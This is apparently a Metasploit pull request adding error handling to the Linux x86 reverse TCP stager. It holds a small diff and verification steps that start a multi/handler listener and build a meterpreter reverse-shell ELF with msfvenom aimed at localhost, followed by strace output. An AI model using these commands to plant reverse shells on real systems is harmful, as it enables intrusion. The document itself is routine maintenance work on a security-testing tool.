### PR TITLE
add error handling to x86 linux reverse tcp stager

### DIFF
--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -18,7 +18,7 @@ module MetasploitModule
     super(merge_info(info,
       'Name'        => 'Reverse TCP Stager',
       'Description' => 'Connect back to the attacker',
-      'Author'      => [ 'skape', 'egypt' ],
+      'Author'      => [ 'skape', 'egypt', 'tkmru' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'linux',
       'Arch'        => ARCH_X86,

--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 71
+  CachedSize = 99
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp

--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 114
+  CachedSize = 142
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp


### PR DESCRIPTION
I add error handling to x86 linux reverse tcp. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722) and [linux stagers need to support retries / delays like the Windows stagers do · Issue #8382 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/8382)

## Verification

List the steps needed to make sure this thing works

- [x] ./msfconsole -qx "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set lhost ip_addr; set lport port; set ExitOnSession false; run -j"
- [x] follow commands
```
$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o "../reverse_tcp_test"
$ sudo chmod +x ./reverse_tcp_test
$ strace ./reverse_tcp_test
execve("./reverse_tcp_test", ["./reverse_tcp_test"], [/* 74 vars */]) = 0
[ Process PID=42959 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 102) = -1 ECONNREFUSED (Connection refused)
_exit(1)                                = ?
+++ exited with 1 +++
```

